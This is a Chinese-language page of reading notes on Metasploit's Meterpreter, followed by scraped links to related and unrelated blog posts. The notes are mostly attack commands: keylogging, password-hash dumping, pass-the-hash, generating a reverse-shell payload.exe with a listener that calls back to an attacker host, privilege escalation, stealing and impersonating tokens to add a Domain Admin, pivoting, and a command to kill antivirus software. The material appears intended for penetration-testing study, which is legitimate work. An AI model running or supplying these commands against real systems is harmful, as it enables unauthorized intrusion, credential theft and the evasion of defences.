Metasploit 读书笔记-神器Meterpreter
一、基本命令
截屏
screenshot
2.获取系统平台信息
sysinfo
3.进程信息
ps
4.获取键盘记录
查看进程信息ps--migrate将会话迁移至explorer.exe进程空间中---然后--
run post/windows/capture/keylog_recorder
过一段时间CTRL+C中止。
最后在另一个终端里,可以看到我们使用键盘记录所捕捉的内容。
5.提取密码哈希
use priv运行特权账号
run post/windows/gather/hashdump
6.传递hash值
use windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
7.权限提升
当我们获得了目标系统的访问权限,可以通过net user命令创建限制权限的普通用户帐号。
XP系统中:
net user bob password123 /add.
然后,创建一个基于Meterpreter的攻击程序payload.exe,复制到目标XP机器上,并在bob用户下运行。
利用攻击载荷生成器(msfpayload)来创建Windows可执行文件格式的Meterpreter攻击载荷程序payload.exe.
root@bt:/opt/framework3/msf3# msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.33.139 LPORT=443 X>payload.exe
root@bt:/opt/framework3/msf3# msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp
LHOST=192.168.33.139 LPORT=443 E
meterpreter> getuid
创建载荷时,设置LHOST和LPORT参数指示了反向shell连接到攻击机的地址和端口443,
随后调用msfcli接口进行监听并等待连接,当有连接到达时,将会开启Meterpreter的shell。
shell
use priv
getsystem
getuid
8.令牌假冒
在令牌假冒攻击中,我们获取目标系统中的一个Kerberos令牌,将其用在身份认证环节,来假冒当初创建这个令牌的用户。这是Meterpreter最强大的功能之一。
用户登录服务器时,一个Kerberos令牌会在服务器上在一段时间内保持有效。
我们就可以利用这个令牌入侵系统,而不需破解他的密码。
9.使用PS
使用PS查看进程
使用steal_token命令和PID参数,盗取域管理员用户的令牌。PID为域管理员运行的进程
另外,有些情况下PS命令不能列出域管理员运行的进程,我们可以使用incognito命令列出系统中可用的令牌。
最好是同时检查ps命令和incognito命令的输出结果。
通过use incognito命令加载incognito模块,然后通过list_tokens -u列出令牌。
假冒令牌:
impersonate_token ****\\***(注意双斜杠)
添加用户:
add_user omgcom password123 -h 192.168.33.50(域控)
赋予域管理员权限:
add_group_user "Domain Admins" omgcom -h 192.168.33.50
10.跳板攻击(Pivoting)
允许从Meterpreter 终端攻击网络中的其他系统。
跳板攻击允许你使用已经取得控制的Meterpreter终端来攻击内部网络中的其他机器。
11.使用Meterpreter脚本
run 脚本名字
12.迁移进程
攻击系统时常常利用IE漏洞等,如果目标主机关闭了浏览器,Meterpreter会话也随之关闭,从而导致目标丢失。
渗透以后要将会话迁移到内存空间稳定的、不会关闭的服务进程中,以维持稳定的控制。
run post/windows/manage/migrate
13.关闭杀毒软件
run killav
14。获取系统密码hash
run hashdump
15.查看目标所有流量
run packetrecorder -i 1
16.获取系统信息
Scraper脚本可以获取用户名、密码、注册表、哈希值、收集系统信息等。
run scraper
17。控制持久化
Metasploit 读书笔记-神器Meterpreter的更多相关文章
- Metasploit 读书笔记-持久控制
Meterpreter的persisitence脚本允许主任meterpreter代理,以确保系统重启之后Meterpreter还能运行。如果是反弹连接方式,可以设置连接攻击机的时间间隔。如果是绑定方 ...
- metasploit 读书笔记-EXPLOITATION
一、渗透攻击基础 1.常用命令 show exploits 显示Meta框架中所有可用的渗透攻击模块。 show options 显示模块所需要的各种参数 back 返回Meta的上一个状态 sear ...
- metasploit 读书笔记-信息收集
三、信息收集 被动信息收集 在不接触目标系统时进行的信息收集,包括使用工具Yeti、Whois (1)Whois msf > whois secmaniac.net (2)Netcraft:fi ...
- metasploit 读书笔记1
The msfpayload component of Metasploit allows you to generate shellcode, executables, and much more ...
- 读书笔记汇总 - SQL必知必会(第4版)
本系列记录并分享学习SQL的过程,主要内容为SQL的基础概念及练习过程. 书目信息 中文名:<SQL必知必会(第4版)> 英文名:<Sams Teach Yourself SQL i ...
- 读书笔记--SQL必知必会18--视图
读书笔记--SQL必知必会18--视图 18.1 视图 视图是虚拟的表,只包含使用时动态检索数据的查询. 也就是说作为视图,它不包含任何列和数据,包含的是一个查询. 18.1.1 为什么使用视图 重用 ...
- 《C#本质论》读书笔记(18)多线程处理
.NET Framework 4.0 看(本质论第3版) .NET Framework 4.5 看(本质论第4版) .NET 4.0为多线程引入了两组新API:TPL(Task Parallel Li ...
- C#温故知新:《C#图解教程》读书笔记系列
一.此书到底何方神圣? 本书是广受赞誉C#图解教程的最新版本.作者在本书中创造了一种全新的可视化叙述方式,以图文并茂的形式.朴实简洁的文字,并辅之以大量表格和代码示例,全面.直观地阐述了C#语言的各种 ...
- C#刨根究底:《你必须知道的.NET》读书笔记系列
一.此书到底何方神圣? <你必须知道的.NET>来自于微软MVP—王涛(网名:AnyTao,博客园大牛之一,其博客地址为:http://anytao.cnblogs.com/)的最新技术心 ...
随机推荐
- Visualforce入门第二篇_2017.3.1
代码实现类似Html的表单(Form) <apex:page sidebar="false" standardController="Account"&g ...
- hihoCoder#1139(二分+bfs)
时间限制:10000ms 单点时限:1000ms 内存限制:256MB 描述 在上一回和上上回里我们知道Nettle在玩<艦これ>,Nettle在整理好舰队之后终于准备出海捞船和敌军交战了 ...
- POJ3321(dfs序列+树状数组)
Apple Tree Time Limit: 2000MS Memory Limit: 65536K Total Submissions: 25711 Accepted: 7624 Descr ...
- top命令 Linux查看CPU和内存使用情况,cpu监控之一
一.top命令 top命令是一个功能十分强大的监控系统的工具,对于系统管理员而言尤其重要.但是,它的缺点是会消耗很多系统资源. 在系统维护的过程中,随时可能有需要查看 CPU 使用率,并根据相应信息分 ...
- (内存地址hashcode与对象内容hashcode)分析== 和 equal()方法
==.equals()和hashCode()字符串测试 1.hashCode() 是根据 内容 来产生hash值的 2.System.identityHashCode() 是根据 内存地址 来产生ha ...
- 使用Eclipse的常见问题整理
我在Eclipse里新建一个android工程的时候附带着产生了一个名字为appcompat_v7的工程,这个工程是干什么用的啊?为何我新建的工程都出错了,错误信息提示为: error: Error ...
- 利用powerdesigner创建表模型后导出sql语句方法,以及报错 Generation aborted due to errors detected during the verification of the model.的解决办法
今天用powerdesigner建了表模型,下面先说一下导出sql语句的步骤. 1.选项 2. 然后就报错了,下面说解决办法,很简单. 你没看错,把模型检查的√去掉就行了~~ 导出表名不带双引号的设置 ...
- eclips git中的add to Index无效解决
今天在使用eclips git中的add to Index,发现其无效,具体如下 问题描述: 通过export导入一个git java项目 在java工程中新增一个类文件IndicatorCalcTe ...
- cJSON
http://blog.csdn.net/wangchangshuai0010/article/details/18225423
- NSClassFromString 实例话静态库中的类
Class myClass = NSClassFromString("StaticLibyClassName"); StaticLibyClassName是从静态库中实例化一个Cl ...